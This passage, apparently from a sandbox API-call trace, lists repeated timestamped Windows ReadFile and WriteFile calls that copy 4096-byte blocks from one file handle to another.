nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.634] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.634] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.635] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.635] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.635] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.635] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.635] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.635] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.635] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.636] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.636] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.636] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.636] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.637] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.637] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.637] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.637] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.638] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.638] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.638] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.638] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.638] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.638] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.639] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.639] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.639] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.639] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.639] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.639] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.639] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.640] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.640] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.640] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.640] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.640] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.640] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.640] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.641] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.641] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.641] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.641] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.641] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.641] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.641] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.642] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.642] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.642] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.642] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.642] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.642] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.642] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.643] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.643] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.643] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.643] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.644] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.644] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.644] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.644] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.644] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.644] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.644] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.644] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.644] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.645] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.645] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.645] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.645] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.645] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.645] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.645] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.645] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.645] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.646] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.646] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.646] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.835] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.853] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.853] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.854] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.854] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.854] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.854] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.854] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.854] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.854] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.855] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.855] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.855] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.855] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.855] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.855] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.855] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.855] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.856] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.856] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.856] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.856] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.856] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.856] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.856] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, 